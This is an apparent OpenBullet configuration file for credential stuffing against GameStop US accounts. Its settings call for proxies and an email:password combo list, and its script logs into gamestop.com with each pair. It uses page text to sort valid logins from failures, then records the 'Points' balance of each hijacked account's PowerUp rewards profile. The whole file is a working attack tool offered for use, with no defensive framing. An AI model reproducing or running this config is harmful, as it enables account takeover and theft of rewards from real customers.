[SETTINGS]
{
  "Name": "GameStop US",
  "SuggestedBots": 20,
  "LastModified": "2018-12-11T11:24:10.688224+01:00",
  "AdditionalInfo": "",
  "Author": "FreakShock",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
BROWSERACTION Open "" 
IF "<ADDRESS>" EqualTo "https://login.gamestop.com/Account/Login"
JUMP #CLEAR_EMAIL
ENDIF

IF "<SOURCE>" Contains "There was an error"
JUMP #LOGINURL
ENDIF

#LOGINURL NAVIGATE "https://login.gamestop.com/Account/Login" 60 
#CLEAR_EMAIL ELEMENTACTION XPath "//*[@id=\"username\"]" 
  Clear "" -> VAR "" 
#CLEAR_PASS ELEMENTACTION XPath "//*[@id=\"password\"]" 
  Clear "" -> VAR "" 
#USER ELEMENTACTION XPath "//*[@id=\"username\"]" 
  SendKeys "<USER>" -> VAR "" 
#PASS ELEMENTACTION XPath "//*[@id=\"password\"]" 
  SendKeys "<PASS>" -> VAR "" 
BROWSERACTION SendKeys "<ENTER>" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "you supplied appears to be incorrect" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "lnkLogOut\">Sign Out" 
NAVIGATE "https://login.gamestop.com/Profile#powerup" 60 
FUNCTION Delay "3000" -> VAR "" 
ELEMENTACTION XPath "//*[@id=\"powerup\"]/section[1]/div[1]/div[3]/strong" 
  GetText "" -> CAP "Points" 
BROWSERACTION ClearCookies "" 
BROWSERACTION Quit "" 
